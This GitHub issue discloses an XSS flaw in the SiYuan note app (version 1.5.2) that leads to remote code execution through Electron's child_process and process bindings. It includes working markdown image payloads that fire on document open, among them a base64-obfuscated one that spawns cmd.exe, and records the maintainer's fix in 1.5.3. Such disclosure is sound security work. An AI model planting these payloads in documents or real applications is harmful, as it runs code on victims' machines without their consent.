Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

XSS 导致客户端 RCE #3431

Closed
Echocipher opened this issue Nov 16, 2021 · 2 comments
Closed

XSS 导致客户端 RCE #3431

Echocipher opened this issue Nov 16, 2021 · 2 comments
Assignees
@88250
Labels
Bug
Milestone
1.5.3

Comments

@Echocipher
Copy link

描述问题 Describe the problem

正文中由于标签过滤不严谨存在XSS漏洞,且由于未限制通过require 引入child_process因此可以执行系统命令,同样的,通过process 也可以执行系统命令

期待的结果 Expected result

修复XSS漏洞以及electron导致的命令执行问题

截屏或者录屏演示 Screenshot or screen recording presentation

XSS

新建文档插入如下poc

![a]("onerror="alert(1))

客户端效果如下

image

浏览器效果如下

image

命令执行

我们接下来就可以直接通过require进行命令执行,比如唤起计算器,新建文档插入如下POC,当用户打开文档即可触发

![a]("onerror="require('child_process').exec('open -a Calculator',null);)

image

Windows以及process同理,poc同下

![a]("onerror="eval(atob('dmFyIFByb2Nlc3MgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmJpbmRpbmcoJ3Byb2Nlc3Nfd3JhcCcpLlByb2Nlc3M7CnZhciBwcm9jID0gbmV3IFByb2Nlc3MoKTsKcHJvYy5vbmV4aXQgPSBmdW5jdGlvbiAoYSwgYikge307CnZhciBlbnYgPSB3aW5kb3cucGFyZW50LnRvcC5wcm9jZXNzLmVudjsKdmFyIGVudl8gPSBbXTsKZm9yICh2YXIga2V5IGluIGVudikgZW52Xy5wdXNoKGtleSArICc9JyArIGVudltrZXldKTsKcHJvYy5zcGF3bih7CiAgICBmaWxlOiAnY21kLmV4ZScsCiAgICBhcmdzOiBbJy9rIGNhbGMnXSwKICAgIGN3ZDogbnVsbCwKICAgIHdpbmRvd3NWZXJiYXRpbUFyZ3VtZW50czogZmFsc2UsCiAgICBkZXRhY2hlZDogZmFsc2UsCiAgICBlbnZQYWlyczogZW52XywKICAgIHN0ZGlvOiBbewogICAgICAgIHR5cGU6ICdpZ25vcmUnCiAgICB9LCB7CiAgICAgICAgdHlwZTogJ2lnbm9yZScKICAgIH0sIHsKICAgICAgICB0eXBlOiAnaWdub3JlJwogICAgfV0KfSk7')))

image

版本环境 Version environment

  • Version: 版本1.5.2 (1.5.2)
  • Operating system: MAC OS/Windows
  • Browser (if used): Any
@88250 88250 self-assigned this Nov 16, 2021
@88250 88250 added the Bug label Nov 17, 2021
@88250 88250 changed the title XSS导致客户端RCE XSS 导致客户端 RCE Nov 17, 2021
@88250 88250 added this to the 1.5.3 milestone Nov 17, 2021
88250 added a commit to 88250/lute that referenced this issue Nov 17, 2021
@88250
🐛 Protyle XSS 导致客户端 RCE siyuan-note/siyuan#3431
89b53ce
@88250 88250 closed this as completed Nov 17, 2021
@ttimasdf
Copy link

ttimasdf commented Nov 18, 2021
edited

厂商确认,CNVD编号,安排上 😄

@88250
Copy link
Member

88250 commented Nov 18, 2021

请大家帮忙继续找找安全方面的漏洞,谢谢。

@Echocipher Echocipher mentioned this issue Nov 18, 2021
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@88250 88250

Labels
Bug
Projects
None yet
Milestone
1.5.3
Development

No branches or pull requests
3 participants
@88250 @ttimasdf @Echocipher